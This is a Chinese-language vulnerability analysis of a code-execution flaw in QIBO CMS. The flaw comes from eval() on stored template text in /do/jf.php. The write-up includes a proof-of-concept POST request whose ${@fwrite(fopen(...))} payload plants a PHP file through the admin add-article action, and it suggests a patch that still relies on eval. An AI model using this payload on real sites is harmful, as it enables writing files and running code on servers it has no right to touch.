QIBO /do/jf.php EvilCode Execution Injected By /hack/jfadmin/admin.php

catalog

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

这个漏洞的成因简单来说可以归纳为如下几点

. 类似于ECSHOP的的模版代码编译功能，QIBO允许在文章中添加指定格式的模版代码
. 在显示文章的时候，QIBO会使用: eval("\$rs2[title]=\"$rs2[title]\";");方式对模版动态变量进行赋值
. 黑客可以通过XSS、CSRF劫持管理员向数据库中注入恶意代码: ${@fwrite(fopen('ali.php', 'w+'), 'test’)}
. 由于PHP的动态执行特性，eval赋值的时候，在双引号中的代码会被动态执行，从而导致原本的变量赋值变成了代码执行入口

Relevant Link:

2. 漏洞触发条件

攻击向量

. 黑客需要向{$pre}jfabout数据表注入恶意代码
    ) 黑客直接拿到管理员密码，登录了后台
    ) CSRF
    ) XSS攻击
. 文章显示的时候，对模版变量进行解析，未对模版内容本身进行有效的过滤、恶意判断

0x1: POC

http://localhost/qibo/admin/index.php?lfj=jfadmin&action=addjf
POST：
title=test&content=${@fwrite(fopen('ali.php', 'w+'), 'test’)}&list=1

或者普通用户访问/do/jf.php，即可在do目录下生成ali.php文件

3. 漏洞影响范围
4. 漏洞代码分析

/do/jf.php

<?php
require(dirname(__FILE__)."/"."global.php");

$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");
while($rs = $db->fetch_array($query))
{
    $fnameDB[$rs[fid]]=$rs[name];
    $query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");
    while($rs2 = $db->fetch_array($query2))
    {
        /*
        1. 用于变量赋值的客体用双引号包裹，PHP curl syntax(${${}})可以执行
        2. 未对模版内容进行转义处理，存在闭合注入的可能
        */
        eval("\$rs2[title]=\"$rs2[title]\";");
        eval("\$rs2[content]=\"$rs2[content]\";");
        $jfDB[$rs[fid]][]=$rs2;
    }
}

require(ROOT_PATH."inc/head.php");
require(html("jf"));
require(ROOT_PATH."inc/foot.php");

?>

/hack/jfadmin/admin.php

//通过这个向量黑客可以向{$pre}jfabout数据表注入恶意代码
..
elseif($action=="addjf"&&$Apower[jfadmin_mod])
{
    $db->query("INSERT INTO `{$pre}jfabout` ( `fid` , `title` , `content`, `list` ) VALUES ( '$fid', '$title', '$content', '$list' )");
    jump("添加成功","index.php?lfj=jfadmin&job=listjf&fid=$fid",);
}
..

5. 防御方法

/do/jf.php

<?php
require(dirname(__FILE__)."/"."global.php");

$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");
while($rs = $db->fetch_array($query)){
    $fnameDB[$rs[fid]]=$rs[name];
    $query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");
    while($rs2 = $db->fetch_array($query2)){
        //eval("\$rs2[title]=\"$rs2[title]\";");
        //eval("\$rs2[content]=\"$rs2[content]\";");
        $rs2[title] = addslashes($rs2[title]);
        $rs2[content] = addslashes($rs2[content]);
        eval("\$rs2[title]='$rs2[title]';");
        eval("\$rs2[content]='$rs2[content]';");
        $jfDB[$rs[fid]][]=$rs2;
    }
}

require(ROOT_PATH."inc/head.php");
require(html("jf"));
require(ROOT_PATH."inc/foot.php");

?>

代码防御的关键点主要如下

. 将eval赋值语句内的双引号改为单引号，禁止其PHP动态执行特性
. 在参数外层包裹addslash，防止黑客注入进行闭合

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved